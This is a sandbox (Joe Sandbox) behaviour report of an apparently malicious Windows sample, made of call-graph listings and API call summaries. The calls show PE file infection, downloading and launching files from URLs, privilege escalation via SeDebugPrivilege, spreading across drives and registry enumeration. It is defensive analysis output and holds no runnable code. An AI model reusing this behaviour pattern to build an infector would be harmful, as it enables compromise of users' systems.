CharUpperA 41988 24242c7 41891->41988 41893 242572f 41893->41881 41893->41883 41894 2429a61 41895 2429aa0 RtlEnterCriticalSection 41894->41895 41896 2429a6a MultiByteToWideChar 41894->41896 41902 2429ac5 41895->41902 41897 2429a95 41896->41897 41897->41893 41897->41895 41898 24242c7 2 API calls 41899 24299e6 41898->41899 41899->41893 41899->41894 41899->41898 41900 2429a4a 41899->41900 41901 2425719 11 API calls 41900->41901 41901->41893 41903 2429b03 GetLocalTime GetFileAttributesA SetFileAttributesA 41902->41903 41904 2429b33 41903->41904 41905 2429b3f CreateFileA 41903->41905 41908 242b832 RtlLeaveCriticalSection 41904->41908 41909 242b821 GlobalFree 41904->41909 41906 2429b6a GetFileSize 41905->41906 41907 2429b7f 41905->41907 41906->41907 41910 242b7d4 FindCloseChangeNotification SetFileAttributesA 41907->41910 41913 2429bac GetFileTime CreateFileMappingA 41907->41913 41908->41893 41911 242b84d Sleep 41908->41911 41909->41908 41910->41904 41912 242b7f8 DeleteFileA 41910->41912 41911->41893 41912->41904 41914 2429c0f MapViewOfFile 41913->41914 41917 2429e9a 41913->41917 41914->41917 41924 2429c31 41914->41924 41915 242b724 FindCloseChangeNotification 41915->41910 41916 242b73e SetFilePointer SetEndOfFile 41915->41916 41920 242b774 41916->41920 41921 242b79b 41916->41921 41917->41915 41918 242b517 41917->41918 41919 242b71a UnmapViewOfFile 41917->41919 41928 242b53c 41917->41928 41918->41917 41918->41919 41922 242b6dc GlobalAlloc 41918->41922 41919->41915 41920->41921 41923 242b77a WriteFile 41920->41923 41925 242b7b2 SetFileTime 41921->41925 41926 242b7a1 GlobalFree 41921->41926 41927 242b6ce 41922->41927 41923->41921 41924->41917 41992 24213e8 InterlockedExchange 41924->41992 41925->41910 41926->41925 41927->41919 41928->41927 41930 2429cde 41932 2429d01 41930->41932 42138 24213e8 InterlockedExchange 41930->42138 41932->41917 41933 242a081 lstrcpyn lstrcmpiA 41932->41933 41934 242a0b7 41933->41934 41934->41917 41935 242a149 GlobalAlloc 41934->41935 41937 
242a17e 41934->41937 41936 242a17b 41935->41936 41936->41937 41993 24213e8 InterlockedExchange 41937->41993 41939 242a914 41940 242a97e 41939->41940 42139 24280da InterlockedExchange 41939->42139 41942 242a9fa 41940->41942 42140 24280da InterlockedExchange 41940->42140 41943 242aa51 41942->41943 42141 24280da InterlockedExchange 41942->42141 41994 24213e8 InterlockedExchange 41943->41994 41945 242a5c5 IsBadHugeWritePtr 41949 242a1f7 41945->41949 41948 242aa67 41950 242aae2 41948->41950 42142 24280da InterlockedExchange 41948->42142 41949->41917 41949->41939 41949->41945 41956 242a5f3 41949->41956 41954 242aaf9 41950->41954 42143 2427b42 41950->42143 41953 242abd9 41995 24213e8 InterlockedExchange 41953->41995 41954->41953 42157 24280da InterlockedExchange 41954->42157 41958 242a6e0 IsBadHugeWritePtr 41956->41958 41958->41939 41959 242a705 IsBadHugeWritePtr 41958->41959 41959->41939 41974 242a71c 41959->41974 41960 242abef 41961 242ac7a 41960->41961 41963 242acb7 41960->41963 42158 24280da InterlockedExchange 41960->42158 42159 242687e 41961->42159 41963->41917 41996 242867a 41963->41996 41967 2427c71 2 API calls 41976 242ade3 41967->41976 41968 242a778 IsBadHugeWritePtr 41969 242a79b IsBadHugeWritePtr 41968->41969 41968->41974 41969->41974 41970 242a7c7 lstrcmpiA 41971 242a826 lstrcmpiA 41970->41971 41970->41974 41972 242a85b lstrcmpiA 41971->41972 41971->41974 41973 242a88d lstrcmpiA 41972->41973 41972->41974 41973->41974 41975 242a8ce lstrcmpiA 41973->41975 41974->41939 41974->41968 41974->41970 41974->41971 41974->41972 41974->41973 41974->41975 41975->41974 41976->41917 42187 2422745 41976->42187 41978 242b31f 41979 242b3f2 41978->41979 42198 24213e8 InterlockedExchange 41979->42198 41981 242b43c GetTickCount 41981->41918 41982 242b469 41981->41982 42199 24213e8 InterlockedExchange 41982->42199 41984 242b46e 41984->41918 42200 24213e8 InterlockedExchange 41984->42200 41986->41889 41987->41891 41991 24242d0 41988->41991 41989 2424353 41989->41899 41990 2424317 
tolower tolower 41990->41991 41991->41989 41991->41990 41992->41930 41993->41949 41994->41948 41995->41960 41997 24286e3 41996->41997 42001 2428714 41997->42001 42229 24213e8 InterlockedExchange 41997->42229 41999 2428789 42201 24213e8 InterlockedExchange 41999->42201 42001->41999 42230 24280da InterlockedExchange 42001->42230 42002 24287a8 42004 24287d7 42002->42004 42231 24213e8 InterlockedExchange 42002->42231 42006 2427b42 InterlockedExchange 42004->42006 42007 2428810 42006->42007 42008 2427b42 InterlockedExchange 42007->42008 42009 2428838 42008->42009 42202 24213e8 InterlockedExchange 42009->42202 42011 2428862 42012 2428891 42011->42012 42232 24213e8 InterlockedExchange 42011->42232 42014 2427b42 InterlockedExchange 42012->42014 42015 24288b8 42014->42015 42016 2427b42 InterlockedExchange 42015->42016 42017 24288f5 42016->42017 42018 242687e InterlockedExchange 42017->42018 42019 2428930 42018->42019 42203 24213e8 InterlockedExchange 42019->42203 42021 2428940 42204 2425ccb 42021->42204 42023 242896c 42208 24213e8 InterlockedExchange 42023->42208 42025 2428982 42026 24289b1 42025->42026 42233 24213e8 InterlockedExchange 42025->42233 42028 2427b42 InterlockedExchange 42026->42028 42029 24289e2 42028->42029 42209 24213e8 InterlockedExchange 42029->42209 42031 24289f8 42032 2428a2f 42031->42032 42234 24213e8 InterlockedExchange 42031->42234 42034 2427b42 InterlockedExchange 42032->42034 42035 2428a72 42034->42035 42036 242687e InterlockedExchange 42035->42036 42037 2428adf 42036->42037 42210 24284e6 42037->42210 42039 2428b05 42040 242687e InterlockedExchange 42039->42040 42041 2428b25 42040->42041 42042 2427b42 InterlockedExchange 42041->42042 42043 2428b4d 42042->42043 42044 242687e InterlockedExchange 42043->42044 42045 2428ba8 42044->42045 42223 24213e8 InterlockedExchange 42045->42223 42047 2428bd2 42049 2428c11 42047->42049 42235 24213e8 InterlockedExchange 42047->42235 42050 2427b42 InterlockedExchange 42049->42050 42051 2428c4e 42050->42051 42224 
24213e8 InterlockedExchange 42051->42224 42053 2428c5e 42055 2428c9d 42053->42055 42236 24213e8 InterlockedExchange 42053->42236 42056 2427b42 InterlockedExchange 42055->42056 42057 2428ce0 42056->42057 42058 242687e InterlockedExchange 42057->42058 42059 2428d00 42058->42059 42060 242687e InterlockedExchange 42059->42060 42061 2428d3a 42060->42061 42062 24284e6 InterlockedExchange 42061->42062 42063 2428d60 42062->42063 42064 242687e InterlockedExchange 42063->42064 42065 2428d80 42064->42065 42066 24284e6 InterlockedExchange 42065->42066 42067 2428da6 42066->42067 42068 242687e InterlockedExchange 42067->42068 42069 2428dec 42068->42069 42070 2427b42 InterlockedExchange 42069->42070 42071 2428e14 42070->42071 42225 24213e8 InterlockedExchange 42071->42225 42073 2428e24 42075 2428e63 42073->42075 42237 24213e8 InterlockedExchange 42073->42237 42076 2427b42 InterlockedExchange 42075->42076 42077 2428ebb 42076->42077 42078 2427b42 InterlockedExchange 42077->42078 42079 2428f2e 42078->42079 42080 2427b42 InterlockedExchange 42079->42080 42081 2428f56 42080->42081 42226 24213e8 InterlockedExchange 42081->42226 42083 2428f66 42085 2428fa5 42083->42085 42238 24213e8 InterlockedExchange 42083->42238 42086 2427b42 InterlockedExchange 42085->42086 42087 2428ff2 42086->42087 42088 242687e InterlockedExchange 42087->42088 42089 242905f 42088->42089 42090 24284e6 InterlockedExchange 42089->42090 42091 2429085 42090->42091 42092 242687e InterlockedExchange 42091->42092 42093 24290a5 42092->42093 42094 242687e InterlockedExchange 42093->42094 42095 24290fb 42094->42095 42096 242687e InterlockedExchange 42095->42096 42097 2429156 42096->42097 42098 2427b42 InterlockedExchange 42097->42098 42099 24291b4 42098->42099 42100 2427b42 InterlockedExchange 42099->42100 42101 24291dc 42100->42101 42227 24213e8 InterlockedExchange 42101->42227 42103 24291ec 42105 2429233 42103->42105 42239 24213e8 InterlockedExchange 42103->42239 42106 2427b42 InterlockedExchange 42105->42106 42107 
242928a 42106->42107 42108 242687e InterlockedExchange 42107->42108 42109 24292aa 42108->42109 42110 242687e InterlockedExchange 42109->42110 42111 2429317 42110->42111 42112 24284e6 InterlockedExchange 42111->42112 42113 242933d 42112->42113 42114 242687e InterlockedExchange 42113->42114 42115 242935d 42114->42115 42116 2427b42 InterlockedExchange 42115->42116 42117 2429383 42116->42117 42118 2427b42 InterlockedExchange 42117->42118 42119 24293ab 42118->42119 42228 24213e8 InterlockedExchange 42119->42228 42121 24293f6 42123 242943d 42121->42123 42240 24213e8 InterlockedExchange 42121->42240 42124 2427b42 InterlockedExchange 42123->42124 42125 2429494 42124->42125 42126 2427b42 InterlockedExchange 42125->42126 42127 24294bc 42126->42127 42128 2427b42 InterlockedExchange 42127->42128 42129 24294e4 42128->42129 42130 2427b42 InterlockedExchange 42129->42130 42131 242950a 42130->42131 42132 2427b42 InterlockedExchange 42131->42132 42133 2429533 42132->42133 42134 2427b42 InterlockedExchange 42133->42134 42135 24295b8 42134->42135 42136 2427b42 InterlockedExchange 42135->42136 42137 24295ed 42136->42137 42137->41917 42137->41967 42138->41932 42139->41940 42140->41942 42141->41943 42142->41950 42144 242687e InterlockedExchange 42143->42144 42145 2427b61 42144->42145 42146 2427ba2 42145->42146 42147 2427b72 42145->42147 42149 2427bd5 42146->42149 42150 2427ba8 42146->42150 42245 2426a85 InterlockedExchange 42147->42245 42153 2427c06 42149->42153 42154 2427bdb 42149->42154 42246 2427410 InterlockedExchange 42150->42246 42151 2427b92 42151->41954 42153->42151 42248 24279f3 InterlockedExchange 42153->42248 42247 24278a4 InterlockedExchange 42154->42247 42157->41953 42158->41961 42160 24268a6 42159->42160 42166 242689f 42159->42166 42249 24213e8 InterlockedExchange 42160->42249 42162 24268b2 42184 24268df 42162->42184 42250 24213e8 InterlockedExchange 42162->42250 42165 24268cd 42165->42184 42251 24213e8 InterlockedExchange 42165->42251 42166->41963 42168 24268fb 42169 
2426911 42168->42169 42170 2426998 42168->42170 42252 24213e8 InterlockedExchange 42169->42252 42256 24213e8 InterlockedExchange 42170->42256 42173 242699d 42175 2426968 42173->42175 42257 24213e8 InterlockedExchange 42173->42257 42174 2426916 42176 2426943 42174->42176 42177 242692c 42174->42177 42259 24213e8 InterlockedExchange 42175->42259 42254 24213e8 InterlockedExchange 42176->42254 42253 24213e8 InterlockedExchange 42177->42253 42182 24269b4 42258 24213e8 InterlockedExchange 42182->42258 42183 2426931 42255 24213e8 InterlockedExchange 42183->42255 42260 24213e8 InterlockedExchange 42184->42260 42261 24213e8 InterlockedExchange 42187->42261 42189 2422754 42190 2422a79 42189->42190 42191 2422b0f 42189->42191 42197 24227a3 42189->42197 42192 2422a86 42190->42192 42193 2422ad5 42190->42193 42191->42197 42264 242231e InterlockedExchange CreateFileMappingA MapViewOfFile UnmapViewOfFile CloseHandle 42191->42264 42262 2421420 InterlockedExchange 42192->42262 42263 2421420 InterlockedExchange 42193->42263 42197->41978 42198->41981 42199->41984 42200->41984 42201->42002 42202->42011 42203->42021 42205 2425da7 42204->42205 42241 24213e8 InterlockedExchange 42205->42241 42207 2425e39 42207->42023 42208->42025 42209->42031 42211 2428521 42210->42211 42212 2428673 42211->42212 42213 242853b 42211->42213 42242 24213e8 InterlockedExchange 42211->42242 42212->42039 42243 24213e8 InterlockedExchange 42213->42243 42216 24285a0 42218 2427b42 InterlockedExchange 42216->42218 42219 24285c5 42216->42219 42217 242855f 42217->42216 42244 24213e8 InterlockedExchange 42217->42244 42218->42219 42221 242687e InterlockedExchange 42219->42221 42222 2428663 42221->42222 42222->42039 42223->42047 42224->42053 42225->42073 42226->42083 42227->42103 42228->42121 42229->41997 42230->42001 42231->42002 42232->42011 42233->42025 42234->42031 42235->42047 42236->42053 42237->42073 42238->42083 42239->42103 42240->42121 42241->42207 42242->42213 42243->42217 42244->42216 42245->42151 42246->42151 
42247->42151 42248->42151 42249->42162 42250->42165 42251->42168 42252->42174 42253->42183 42254->42183 42255->42175 42256->42173 42257->42182 42258->42175 42259->42184 42260->42166 42261->42189 42262->42197 42263->42197 42264->42197 42265->41706 42267 2425c43 42266->42267 42268 2425c34 lstrcat 42266->42268 42314 2425618 42267->42314 42268->42267 42270 2425c4f lstrcpy 42319 24213e8 InterlockedExchange 42270->42319 42272 2425c65 42273 2425c77 lstrlen wsprintfA 42272->42273 42274 2425c9f lstrlen wsprintfA 42272->42274 42275 2425cc6 42273->42275 42274->42275 42275->41715 42322 2425b02 42276->42322 42279 242bad2 42279->41715 42280 242b94d InternetOpenA 42281 242baa6 42280->42281 42282 242b974 InternetOpenUrlA 42280->42282 42284 242baaf InternetCloseHandle 42281->42284 42285 242babc 42281->42285 42282->42281 42283 242b9a6 42282->42283 42287 242b9ce InternetReadFile 42283->42287 42288 242b9ac CreateFileA 42283->42288 42284->42285 42285->42279 42286 242bac5 InternetCloseHandle 42285->42286 42286->42279 42292 242b9f6 42287->42292 42288->42287 42289 242ba99 CloseHandle 42289->42281 42290 242ba12 WriteFile 42290->42292 42291 242ba58 42291->42289 42292->42287 42292->42289 42292->42290 42292->42291 42294 242bf26 42293->42294 42295 242bf2d GlobalAlloc ReadFile 42293->42295 42294->41715 42296 242bf66 lstrlen 42295->42296 42308 242bfa2 42295->42308 42298 242bf86 42296->42298 42297 242c015 SetFilePointer WriteFile SetFilePointer SetEndOfFile CloseHandle 42299 242c080 42297->42299 42300 242c08c 42297->42300 42298->42297 42299->42300 42302 242c0b0 42299->42302 42303 242c092 GlobalFree 42300->42303 42304 242c09c DeleteFileA 42300->42304 42301 242bfd1 lstrlen 42301->42308 42305 242c0c0 lstrcpy lstrlen 42302->42305 42306 242c0b6 GlobalFree 42302->42306 42303->42304 42304->42294 42307 242c137 42305->42307 42306->42305 42309 242c174 CreateProcessA Sleep CreateThread 42307->42309 42310 242c162 42307->42310 42308->42297 42308->42301 42311 24210e5 3 API calls 42309->42311 42339 242569f 
lstrcpy GetFileAttributesA DeleteFileA Sleep RtlExitUserThread 42309->42339 42310->42309 42312 242c1d6 Sleep 42311->42312 42312->42294 42313->41712 42320 24213e8 InterlockedExchange 42314->42320 42316 242568a lstrcpy 42316->42270 42318 242563f 42318->42316 42321 24213e8 InterlockedExchange 42318->42321 42319->42272 42320->42318 42321->42318 42323 24242c7 2 API calls 42322->42323 42324 2425b15 42323->42324 42325 2425be2 42324->42325 42326 24242c7 2 API calls 42324->42326 42325->42279 42325->42280 42327 2425b30 42326->42327 42327->42325 42328 2425b3b 42327->42328 42329 24242c7 2 API calls 42328->42329 42330 2425b49 42329->42330 42331 2425b50 GetTickCount 42330->42331 42332 2425b9a GetTickCount 42330->42332 42337 24213e8 InterlockedExchange 42331->42337 42338 24213e8 InterlockedExchange 42332->42338 42335 2425b5d GetTickCount lstrlen wsprintfA 42335->42325 42336 2425ba7 GetTickCount lstrlen wsprintfA 42336->42325 42337->42335 42338->42336 42341 242c787 42340->42341 42348 242c681 42340->42348 42341->41737 42342 242c69c RegEnumValueA 42343 242c773 RegCloseKey 42342->42343 42342->42348 42343->42341 42345 24242c7 2 API calls 42345->42348 42346 242c716 lstrlen lstrlen 42346->42348 42347 2429652 51 API calls 42349 242c763 Sleep 42347->42349 42348->42342 42348->42345 42348->42346 42348->42347 42349->42348 42351 242cc47 42350->42351 42352 242cc86 RtlExitUserThread 42351->42352 42405 242cb2d RegOpenKeyExA 42351->42405 42354 242cc5c Sleep 42355 242cb2d 56 API calls 42354->42355 42356 242cc76 Sleep 42355->42356 42356->42351 42358 242ddc3 42357->42358 42414 24213e8 InterlockedExchange 42358->42414 42360 242de99 Sleep 42361 2425be5 10 API calls 42360->42361 42362 242debf CreateFileA 42361->42362 42363 242df1a 42362->42363 42364 242deed WriteFile CloseHandle 42362->42364 42365 2429652 51 API calls 42363->42365 42366 242df36 Sleep 42363->42366 42371 242df43 42363->42371 42364->42363 42365->42363 42366->42363 42367 242e4d3 RtlExitUserThread 42369 242dc56 11 API calls 42370 242df9a 
Sleep GetLogicalDrives 42369->42370 42370->42371 42371->42367 42371->42369 42372 242e4c3 Sleep 42371->42372 42373 242e007 GetDriveTypeA 42371->42373 42372->42371 42373->42371 42374 242e04b lstrcat CreateFileA 42373->42374 42375 242e2b0 GetFileAttributesA 42374->42375 42376 242e08d GetFileTime FileTimeToSystemTime 42374->42376 42377 242e2f7 CreateFileA 42375->42377 42378 242e2cc SetFileAttributesA DeleteFileA 42375->42378 42379 242e2a3 CloseHandle 42376->42379 42393 242e0cb 42376->42393 42377->42371 42381 242e326 GetSystemTime SystemTimeToFileTime 42377->42381 42454 2425758 SHFileOperation RemoveDirectoryA 42378->42454 42379->42375 42383 2425618 2 API calls 42381->42383 42382 242e2f4 42382->42377 42389 242e394 42383->42389 42384 242e100 ReadFile CharLowerA lstrlen 42384->42393 42395 242e297 42384->42395 42386 24242c7 2 API calls 42386->42393 42387 242e3c2 lstrcat 42387->42389 42388 242e3ae lstrcat 42388->42389 42389->42387 42389->42388 42415 24213e8 InterlockedExchange 42389->42415 42416 242d928 42389->42416 42391 242e3e7 6 API calls 42391->42371 42392 242e47e WriteFile CloseHandle SetFileAttributesA 42391->42392 42392->42371 42393->42379 42393->42384 42393->42386 42394 242e1f3 lstrcpy GetFileAttributesA 42393->42394 42393->42395 42394->42395 42396 242e21f CloseHandle CreateFileA 42394->42396 42395->42379 42396->42395 42397 242e257 WriteFile CloseHandle SetFileAttributesA 42396->42397 42397->42395 42399 2433600 42398->42399 42400 242ca94 lstrcpy GetDriveTypeA 42399->42400 42401 242cb04 42400->42401 42402 242cb1e RtlExitUserThread 42400->42402 42467 242badd Sleep 42401->42467 42406 242cb83 RegEnumValueA 42405->42406 42407 242cc27 RegCloseKey 42405->42407 42408 242cbc7 42406->42408 42409 242cbd2 42406->42409 42407->42354 42408->42409 42410 242cbd4 GetFileAttributesA 42408->42410 42409->42407 42413 242cbe6 42410->42413 42411 242cbfd Sleep 42411->42406 42411->42407 42412 2429652 51 API calls 42412->42413 42413->42411 42413->42412 42414->42360 42415->42389 42417 242d9bd 
42416->42417 42455 24213e8 InterlockedExchange 42417->42455 42419 242d9c5 42420 242d9e3 lstrcat 42419->42420 42456 242d7cf 10 API calls 42419->42456 42457 24213e8 InterlockedExchange 42420->42457 42423 242d9e0 42423->42420 42424 242d9f8 42425 242da13 42424->42425 42458 242d7cf 10 API calls 42424->42458 42427 242db9e 42425->42427 42428 242da3e 42425->42428 42465 24213e8 InterlockedExchange 42427->42465 42459 24213e8 InterlockedExchange 42428->42459 42431 242dba3 42432 242dbbe 42431->42432 42466 242d7cf 10 API calls 42431->42466 42432->42391 42434 242db99 42434->42391 42435 242da43 42435->42434 42460 24213e8 InterlockedExchange 42435->42460 42437 242da8e 42438 242daac lstrcpy 42437->42438 42461 242d7cf 10 API calls 42437->42461 42462 242d6fc InterlockedExchange 42438->42462 42441 242dade 42443 24242c7 2 API calls 42441->42443 42442 242daa9 42442->42438 42444 242daf2 42443->42444 42445 242db88 lstrcat 42444->42445 42463 24213e8 InterlockedExchange 42444->42463 42445->42434 42447 242db02 42448 242db26 lstrcat 42447->42448 42449 242db14 lstrcat 42447->42449 42464 24213e8 InterlockedExchange 42448->42464 42449->42448 42451 242db3d 42452 242db61 lstrlen wsprintfA 42451->42452 42453 242db4f lstrcat 42451->42453 42452->42445 42453->42452 42454->42382 42455->42419 42456->42423 42457->42424 42458->42425 42459->42435 42460->42437 42461->42442 42462->42441 42463->42447 42464->42451 42465->42431 42466->42432 42468 242bb84 lstrcpy CharLowerA 42467->42468 42469 242bb6c lstrcat 42467->42469 42470 24242c7 2 API calls 42468->42470 42469->42468 42471 242bbb3 42470->42471 42472 242bbd6 lstrcat FindFirstFileA 42471->42472 42473 242bbba 42471->42473 42474 242bc06 FindNextFileA 42472->42474 42475 242bc38 42472->42475 42473->42402 42474->42475 42487 242bc1f 42474->42487 42476 242be6b Sleep 42475->42476 42477 242be5e FindClose 42475->42477 42476->42473 42477->42476 42478 242bc46 Sleep 42479 242bc6d lstrlen 42478->42479 42480 242bc9b lstrcat lstrlen CharUpperA lstrlen 42479->42480 
42479->42487 42481 242bce8 lstrcmpiA 42480->42481 42480->42487 42482 242bd00 lstrcmpiA 42481->42482 42481->42487 42482->42487 42483 242bda1 lstrcpy lstrlen lstrcmpiA 42483->42487 42484 2429652 51 API calls 42484->42487 42485 242badd 51 API calls 42485->42487 42486 24242c7 2 API calls 42486->42487 42487->42474 42487->42475 42487->42478 42487->42479 42487->42483 42487->42484 42487->42485 42487->42486 42488 2425719 51 API calls 42487->42488 42488->42487 42490 242f030 2 API calls 42489->42490 42491 2423d24 42490->42491 42492 242f310 2 API calls 42491->42492 42493 2423d97 Sleep 42492->42493 42493->41755 42495 2433600 42494->42495 42496 2423b4e InterlockedIncrement htons 42495->42496 42497 2423bf4 42496->42497 42510 2422fa0 42497->42510 42500 2423cd1 42504 2423cfc InterlockedDecrement RtlExitUserThread 42500->42504 42501 2423c17 GetTickCount 42502 2423c53 42501->42502 42503 2423c68 42501->42503 42505 2422fa0 32 API calls 42502->42505 42506 2423c8a 42503->42506 42525 24232dc 10 API calls 42503->42525 42505->42503 42507 2423ccc 42506->42507 42526 2422cfa 12 API calls 42506->42526 42507->42504 42511 2433600 42510->42511 42512 2422fad socket 42511->42512 42513 2423021 42512->42513 42524 2423154 42512->42524 42516 2422745 5 API calls 42513->42516 42514 24232bf closesocket 42515 24232cc 42514->42515 42515->42500 42515->42501 42517 242303f 42516->42517 42518 2423055 sendto 42517->42518 42517->42524 42519 2423081 select 42518->42519 42518->42524 42521 2423159 recvfrom 42519->42521 42519->42524 42522 2423192 42521->42522 42521->42524 42523 2422399 22 API calls 42522->42523 42522->42524 42523->42524 42524->42514 42524->42515 42525->42506 42526->42507 42528 242451d 42527->42528 42530 2424416 42527->42530 42528->41767 42529 2424424 RegEnumValueA 42529->42530 42536 242445b 42529->42536 42530->42529 42531 242445d RegDeleteValueA 42530->42531 42530->42536 42531->42529 42532 2424485 RegEnumKeyExA 42533 2424513 RegCloseKey 42532->42533 42532->42536 42533->42528 42534 24244ba wsprintfA 
42534->42536 42535 24244b8 42535->42533 42536->42532 42536->42534 42536->42535 42537 24244ec RegDeleteKeyA 42536->42537 42537->42532 42538->41788 42539->41794 42540->41798 42541->41801 42542->41797 42543->41802 42547 24abcd0 42548 24abce8 42547->42548 42549 24abe02 LoadLibraryA 42548->42549 42550 24abe47 VirtualProtect VirtualProtect 42548->42550 42551 24abe19 42549->42551 42553 24abeac 42550->42553 42551->42548 42554 24abe2b GetProcAddress 42551->42554 42553->42553 42554->42551 42555 24abe41 ExitProcess 42554->42555 42556 428599 42559 432ed0 42556->42559 42564 42c860 42559->42564 42561 4285a5 42562 432eff 42562->42561 42576 410ef0 42562->42576 42565 42c875 42564->42565 42575 42c933 42564->42575 42566 42c890 42565->42566 42569 42c8a9 42565->42569 42589 42ac90 131 API calls 42566->42589 42568 42c89f 42568->42562 42570 42c8d6 42569->42570 42573 42c8ef 42569->42573 42590 42ac90 131 API calls 42570->42590 42572 42c8e5 42572->42562 42573->42575 42591 42ac90 131 API calls 42573->42591 42575->42562 42592 413ac0 42576->42592 42578 410f01 GetWindowRect GetParent 42594 4bdeb6 42578->42594 42581 4c0722 GetWindowLongA 42582 410f36 42581->42582 42587 410f49 EqualRect 42582->42587 42601 4c2cea GetWindowLongA ScreenToClient ScreenToClient 42582->42601 42585 411002 42585->42561 42586 410fdf 42588 4c07fa MoveWindow 42586->42588 42587->42585 42587->42586 42588->42585 42589->42568 42590->42572 42591->42575 42593 413ad5 42592->42593 42593->42578 42602 4bde44 42594->42602 42596 4bdebf 42597 4c1f2c 30 API calls 42596->42597 42598 4bdecc 42597->42598 42610 4c0914 42598->42610 42600 410f29 42600->42581 42600->42587 42601->42587 42603 4bde4e __EH_prolog 42602->42603 42604 4c5a94 28 API calls 42603->42604 42606 4bde54 42604->42606 42605 4bde92 42605->42596 42606->42605 42607 4bc1f4 29 API calls 42606->42607 42608 4bde76 42607->42608 42608->42605 42614 4c1ec7 29 API calls __EH_prolog 42608->42614 42611 4c091b 42610->42611 42613 4c0937 42610->42613 42612 4c0921 GetParent 42611->42612 
42611->42613 42612->42613 42613->42600 42614->42605
                                    APIs
                                      • Part of subcall function 024213E8: InterlockedExchange.KERNEL32(024340B8,?), ref: 02421406
                                    • lstrcpy.KERNEL32(00000000,?), ref: 024299C1
                                    • CharUpperA.USER32(00000000), ref: 024299CE
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 0242431E
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 02424330
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: tolower$CharExchangeInterlockedUpperlstrcpy
                                    • String ID: .adata$2$CreateFileA$CreateFileW$GetProcAddress$M$$OpenFile$P$PE$_lopen$d$d
                                    • API String ID: 515353746-2557192021

                                    Control-flow Graph

                                    APIs
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,0000000A), ref: 0242CD7D
                                    • GetLastError.KERNEL32 ref: 0242CD96
                                    • GetVersionExA.KERNEL32(00000094), ref: 0242CDCF
                                    • GetCurrentThread.KERNEL32 ref: 0242CDFF
                                    • OpenThreadToken.ADVAPI32(00000000), ref: 0242CE06
                                    • GetLastError.KERNEL32 ref: 0242CE10
                                    • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 0242CF53
                                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 0242D257
                                    • CloseHandle.KERNEL32(?), ref: 0242D277
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0242D28F
                                    • HeapFree.KERNEL32(00000000), ref: 0242D296
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: OpenProcess$CloseErrorHeapLastThreadToken$ChangeCurrentFindFreeHandleNotificationVersion
                                    • String ID: P$SeDebugPrivilege$local service$network service$system
                                    • API String ID: 134594290-3830299594

                                    Control-flow Graph

                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0242D2E1
                                    • Process32First.KERNEL32(00000000,00000128), ref: 0242D320
                                    • lstrlen.KERNEL32(?), ref: 0242D341
                                    • lstrcpyn.KERNEL32(00000000,?,00000040), ref: 0242D35C
                                    • lstrcpy.KERNEL32(00000000,?), ref: 0242D372
                                    • CharLowerA.USER32(00000000), ref: 0242D37F
                                    • lstrlen.KERNEL32(00000000,M_%d_,0000000A), ref: 0242D398
                                    • wsprintfA.USER32 ref: 0242D3A6
                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0242D3BA
                                    • GetLastError.KERNEL32 ref: 0242D3C6
                                    • ReleaseMutex.KERNEL32(?), ref: 0242D3D9
                                    • CloseHandle.KERNEL32(?), ref: 0242D3E6
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 0242D419
                                    • lstrlen.KERNEL32(?,00000000,00000128), ref: 0242D43A
                                    • lstrcpyn.KERNEL32(00000000,?,00000040), ref: 0242D455
                                    • lstrcpy.KERNEL32(00000000,?), ref: 0242D46B
                                    • CharLowerA.USER32(00000000), ref: 0242D478
                                    • lstrlen.KERNEL32(00000000,M_%d_,0000000A), ref: 0242D491
                                    • wsprintfA.USER32 ref: 0242D49F
                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0242D4B3
                                    • GetLastError.KERNEL32 ref: 0242D4BF
                                    • ReleaseMutex.KERNEL32(?), ref: 0242D4D2
                                    • FindCloseChangeNotification.KERNEL32(?), ref: 0242D4DF
                                    • CloseHandle.KERNEL32(00000000), ref: 0242D510
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Mutexlstrlen$CloseCreate$CharErrorHandleLastLowerProcess32Releaselstrcpylstrcpynwsprintf$ChangeFindFirstNextNotificationSnapshotToolhelp32
                                    • String ID: M_%d_$M_%d_
                                    • API String ID: 3644635855-485321427

                                    Control-flow Graph

                                    APIs
                                    • Sleep.KERNEL32(?,?,?,?,00000000,02433630,024A0240,000000FF,?,0242CB1B,00000003,00000000,00000000,00000000), ref: 0242BB57
                                    • lstrcat.KERNEL32(?,024A5658), ref: 0242BB75
                                    • lstrcpy.KERNEL32(00000000,?), ref: 0242BB8F
